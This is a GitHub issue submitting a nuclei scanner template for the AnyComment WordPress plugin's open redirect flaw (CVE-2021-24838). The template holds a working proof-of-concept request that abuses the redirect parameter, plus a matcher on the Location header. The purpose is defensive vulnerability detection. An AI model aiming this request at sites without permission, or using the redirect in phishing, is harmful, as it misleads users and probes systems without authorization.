### ISSUE TITLE
[nuclei-template] CVE-2021-24838 AnyComment <= 0.2.21 - Open Redirect

### ISSUE THREAD

**Issue by noobexploiter** [projectdiscovery/nuclei-templates#3598]
### Template Information:
CVE-2021-24838 AnyComment <= 0.2.21 - Open Redirect. 
The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82

### Nuclei Template:

```yaml
id: anycomment-open-redirect

info:
  name: anycomment open redirect
  author: noobexploiter
  severity: low
  description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
  reference:
    - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
  tags: wordpress,wp-plugin,open-redirect

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://wpscan.com"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)wpscan\.com.*$'
        part: header

      - type: status
        status:
          - 302
```
